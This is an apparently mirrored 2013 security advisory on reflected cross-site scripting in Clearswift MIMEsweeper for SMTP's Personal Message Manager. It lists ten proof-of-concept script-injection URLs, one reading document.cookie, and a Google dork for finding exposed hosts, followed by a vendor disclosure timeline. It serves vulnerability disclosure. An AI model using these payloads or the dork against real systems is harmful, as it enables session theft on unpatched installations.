Vulners
Lucene search
MIMEsweeper For SMTP 5.5 Cross Site Scripting
🗓️ 18 Feb 2013 00:00:00Reported by Anastasios MonachosType 
packetstorm🔗 packetstormsecurity.com👁 37 Views
`Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)
Vendor: Clearswift Ltd
Vendor URL: http://www.clearswift.com/
Category: Reflective XSS
Google dork: inurl:/MSWPMM/
Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]
[Vulnerability Reproduction]
1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>
[Time-line]
17/07/2009 - Initial discovery
13/01/2012 - Notified vendor
13/01/2012 - Vendor responded
16/01/2012 - Vendor requested more information
16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate
16/01/2012 - Informed vendor for evaluation progress, v5.5.0 is vulnerable too
17/01/2012 - Telephone conversation with vendor in regards the findings
17/01/2012 - Assigned vulnerability reference MSW-1459
25/01/2012 - Requested status update
25/01/2012 - Vendor replied "There is no update on MSW-1459."
16/02/2012 - Requested status update
26/02/2012 - Vendor replied "There is no update on MSW-1459."
23/03/2012 - Requested status update
23/03/2012 - Vendor replied "There is no update on MSW-1459."
09/05/2012 - Requested status update and gave a notice for public disclosure
11/05/2012 - Vendor replied "There is no update on MSW-1459."
18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team
07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release
07/06/2012 - Requested due to date for next release
12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012
13/06/2012 - We suggested to postpone the disclosure after the patch be public
06/12/2012 - Requested status update
06/12/2012 - Vendor sent details for patch
28/01/2013 - Patch is applicable for 5.5.1
09/02/2012 - We requested for demo license to verify fix
15/02/2013 - Vendor could not produce demo license for us to verify the fix
15/02/2013 - Vendor closes incident ticket
18/02/2013 - Public disclosure date
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Feb 2013 00:00Current
7.4High risk
Vulners AI Score7.4